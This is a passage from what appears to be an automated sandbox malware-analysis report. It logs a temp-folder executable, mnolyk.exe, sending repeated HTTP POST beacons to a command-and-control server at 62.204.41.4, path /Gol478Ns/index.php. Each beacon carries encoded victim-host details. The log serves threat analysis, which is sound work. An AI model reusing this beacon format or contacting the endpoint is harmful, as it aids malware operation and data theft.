                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:24.164890051 CET254INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          128192.168.2.64984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:24.342359066 CET255OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:24.406771898 CET255INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          129192.168.2.64985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:24.592098951 CET256OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:24.656240940 CET256INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          13192.168.2.64973162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:54.023441076 CET118OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:54.087827921 CET118INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          130192.168.2.64985162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:24.881496906 CET257OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:24.946882963 CET257INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:24 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          131192.168.2.64985262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:25.383304119 CET258OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:25.449835062 CET258INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          132192.168.2.64985362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:25.706872940 CET259OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:25.771174908 CET259INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          133192.168.2.64985462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:26.635793924 CET260OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:26.700578928 CET260INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          134192.168.2.64985562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:26.978024006 CET261OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:27.043203115 CET261INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          135192.168.2.64985662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:28.475142002 CET262OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:28.542397022 CET262INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          136192.168.2.64985762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:28.881944895 CET263OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:28.947046995 CET263INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:28 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          137192.168.2.64985862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:29.126523972 CET264OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:29.194288015 CET264INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          138192.168.2.64985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:29.375750065 CET265OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:29.442006111 CET265INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          139192.168.2.64986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:29.628066063 CET266OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:29.692550898 CET266INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          14192.168.2.64973262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:54.261631966 CET119OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:54.325506926 CET119INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          140192.168.2.64986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:29.882531881 CET267OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:29.945761919 CET267INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:29 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          141192.168.2.64986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:30.125467062 CET268OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:30.190821886 CET268INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          142192.168.2.64986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:30.373661995 CET269OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:30.437711000 CET269INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          143192.168.2.64986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:30.634610891 CET270OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:30.697523117 CET270INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          144192.168.2.64986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:30.873059034 CET271OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:30.936146021 CET271INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:30 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          145192.168.2.64986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:31.109834909 CET272OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:31.173635960 CET272INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:31 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          146192.168.2.64986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:31.342485905 CET273OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
